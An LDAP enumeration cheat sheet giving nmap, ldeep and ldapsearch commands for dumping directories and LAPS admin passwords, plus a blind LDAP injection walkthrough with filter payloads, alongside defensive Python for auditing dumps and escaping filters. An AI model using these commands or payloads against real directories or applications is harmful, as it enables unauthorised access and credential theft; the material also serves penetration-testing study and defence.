
LDAP Enumeration - Ports 389,636,3268,3269

LDAP - Port 389 or LDAP SSL on Port 636
Nmap Scan
nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10
nmap -sC -Pn -p389,636,3268,3269 10.10.10.10
#DUMP Everything from LDAP - Anonymous
ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump

#Dump as an Authenticated User
ldeep ldap -u Administrator -p 'password' -d steins.local -s ldap://10.0.0.1 all dump
Basic LDAP Search Commands

#Get the FULL domain name and its naming contexts
ldapsearch -x -h 10.10.10.10 -s base namingcontexts 
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts

#Dump accessible data from ldap
ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt

#Dumping passwords using LDAP:
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
#Find the domain name of the DC (root DSE); may also reveal some info or creds
ldapsearch -LLL -x -H ldap://DOMAIN.FQDN.COM -b '' -s base '(objectclass=*)'
JXplorer can be used to access the LDAP service
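As an added example (not code from the original post), the script below parses an ldapsearch LDIF dump like the ldap_dump.txt produced above and reports which entries hand credential material to the bind that produced the dump. This is the check a defender runs to see what an anonymous or low-privileged bind actually exposes. The sample LDIF, its DNs, the LAPS password and the userPassword hash are all constructed placeholders, and the function names are my own.

```python
import re

# Constructed sample of ldapsearch LDIF output (placeholder DNs and values,
# not data from any real directory). The LAPS password and userPassword hash
# are fabricated so the audit has something to find.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=HTB,DC=LOCAL> with scope subtree
#
dn: CN=svc-backup,CN=Users,DC=HTB,DC=LOCAL
objectClass: user
sAMAccountName: svc-backup
description: backup service account, pw kept in the
  ticket system
userAccountControl: 66048

dn: CN=WS01,OU=Workstations,DC=HTB,DC=LOCAL
objectClass: computer
sAMAccountName: WS01$
ms-Mcs-AdmPwd: Placeholder-LAPS-Pa55w0rd
ms-Mcs-AdmPwdExpirationTime: 133000000000000000

dn: uid=alice,ou=People,DC=HTB,DC=LOCAL
objectClass: posixAccount
uid: alice
uidNumber: 1001
homeDirectory: /home/alice
userPassword:: e1NTSEF9cGxhY2Vob2xkZXI=
sshPublicKey: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholder alice@host

# search result
search: 2
result: 0 Success
"""

# Attributes whose presence in a dump means the bind could read secrets.
SECRET_ATTRS = {"ms-mcs-admpwd", "userpassword", "unixuserpassword"}
# Free-text attributes that people tend to stuff credentials into.
FREE_TEXT_ATTRS = {"description", "info", "comment"}
HINT_RE = re.compile(r"\b(pass(word)?|pw|pwd|cred(ential)?s?)\b", re.IGNORECASE)


def parse_ldif(text):
    """Parse LDIF text into a list of (dn, {attribute_lowercase: [values]}).

    Handles comment lines, folded continuation lines (newline + one space)
    and the '::' base64 marker (the value is kept as the raw base64 string).
    """
    text = re.sub(r"\n ", "", text)          # unfold continuation lines
    entries, dn, attrs = [], None, None
    for line in text.splitlines():
        if not line.strip():                  # a blank line ends an entry
            if dn is not None:
                entries.append((dn, attrs))
            dn, attrs = None, None
            continue
        if line.startswith("#") or ":" not in line:
            continue
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.lstrip(": ").strip()
        if name == "dn":
            if dn is not None:
                entries.append((dn, attrs))
            dn, attrs = value, {}
        elif dn is not None:                  # skips trailer lines such as 'result: 0 Success'
            attrs.setdefault(name, []).append(value)
    if dn is not None:
        entries.append((dn, attrs))
    return entries


def audit_exposure(entries):
    """Return (dn, attribute, reason) for every entry that leaks credential material."""
    findings = []
    for dn, attrs in entries:
        for name, values in attrs.items():
            if name in SECRET_ATTRS:
                findings.append((dn, name, "secret attribute readable by this bind"))
            elif name in FREE_TEXT_ATTRS and any(HINT_RE.search(v) for v in values):
                findings.append((dn, name, "credential hint in free-text attribute"))
    return findings


if __name__ == "__main__":
    # For a real dump: with open("ldap_dump.txt") as f: entries = parse_ldif(f.read())
    for dn, attr, reason in audit_exposure(parse_ldif(SAMPLE_LDIF)):
        print(f"{reason}: {attr} on {dn}")
```

Run it against the dump taken with an anonymous bind first, then with a normal user bind; any finding from the anonymous run is a directory ACL problem, and ms-Mcs-AdmPwd readable by ordinary users means the LAPS read permission is delegated too widely.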

If the URL or the response body contains "objectClass", the application is most probably using LDAP.
BLIND LDAP Injection - Web Application 

# The web app lists all printers available in LDAP without showing any errors; the search filter below is used
(&(objectClass=printer)(type=Canon*))

If we inject "*)(objectClass=*))(&(objectClass=void" into the blank field, the web application will issue the following query:
(&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=Canon*))

In that case only the first LDAP query, (&(objectClass=*)(objectClass=*)), is processed; the part built after the blank field is ignored.

As a result the printer icon will be shown to the client, because a filter with objectClass set to a wildcard always returns results. We can construct further true/false statements in the following way:
(&(objectClass=*)(objectClass=users))(&(objectClass=foo)(type=Canon*))
(&(objectClass=*)(objectClass=resources))(&(objectClass=foo)(type=Canon*))

Using such queries it is possible to enumerate the existing object classes based on a true/false condition (whether the printer icon is shown or not).

Similar logic can be used in the case of "OR" blind LDAP injection. Consider the following query with the injected part:

#This query returns no objects, so the printer icon should not be shown to the user.
(|(objectClass=void)(objectClass=void))(&(objectClass=void)(type=Canon*))

#Enumerate the directory structure
(|(objectClass=void)(objectClass=users))(&(objectClass=void)(type=Canon*))
(|(objectClass=void)(objectClass=resources))(&(objectClass=void)(type=Canon*))

#List local user accounts
?objectClass=posixAccount
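As an added example (not code from the original post), here is the printer-lookup filter built two ways: by plain string concatenation, which reproduces the query shown above when fed the injected value, and with RFC 4515 escaping, which keeps the same input inside a single attribute assertion so the filter structure cannot change. It also includes the balance check a defender can run over logged filter strings to spot the extra trailing expression this class of injection leaves behind. The template, function and variable names are my own assumptions.

```python
# Template matching the post: the "blank field" value lands in the objectClass
# assertion. Names here are my own, not the original application's.
TEMPLATE = "(&(objectClass=%s)(type=Canon*))"
# The injected string used in the post.
INJECTED = "*)(objectClass=*))(&(objectClass=void"


def escape_filter_value(value):
    """Escape a value for use inside an LDAP filter (RFC 4515 section 3).

    The five characters with structural meaning in a filter are replaced by
    a backslash and their two-digit hex code, so they are matched literally.
    """
    return "".join(
        "\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value
    )


def build_filter_vulnerable(user_value):
    """Naive concatenation: the user controls the filter structure."""
    return TEMPLATE % user_value


def build_filter_safe(user_value):
    """Same template, but the value is escaped before insertion."""
    return TEMPLATE % escape_filter_value(user_value)


def first_processed_filter(filter_str):
    """Return the first balanced parenthesised expression, which is what a
    lenient LDAP client library ends up sending; anything after it is dropped."""
    depth = 0
    for i, ch in enumerate(filter_str):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return filter_str[: i + 1]
    return filter_str


def looks_injected(filter_str):
    """Detection heuristic for a logged filter string: a legitimate filter is
    exactly one balanced expression, so trailing data after the first balanced
    expression, or an unbalanced parenthesis count, means it was tampered with."""
    depth = 0
    for i, ch in enumerate(filter_str):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return True
            if depth == 0 and i != len(filter_str) - 1:
                return True
    return depth != 0


if __name__ == "__main__":
    for label, build in (("vulnerable", build_filter_vulnerable), ("escaped", build_filter_safe)):
        f = build(INJECTED)
        print(f"{label}: {f}")
        print(f"  server evaluates: {first_processed_filter(f)}")
        print(f"  looks injected:   {looks_injected(f)}")
```

The escaped form turns every `(`, `)` and `*` from the input into `\28`, `\29` and `\2a`, so the directory compares objectClass against the literal text and returns nothing; the balance check is cheap enough to run in the application before the filter is sent, or over the server's request log afterwards.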

You can find LDAP schemas here

# A posixAccount entry contains the attributes below
uidNumber
gidNumber
homeDirectory
userPassword
sshPublicKey
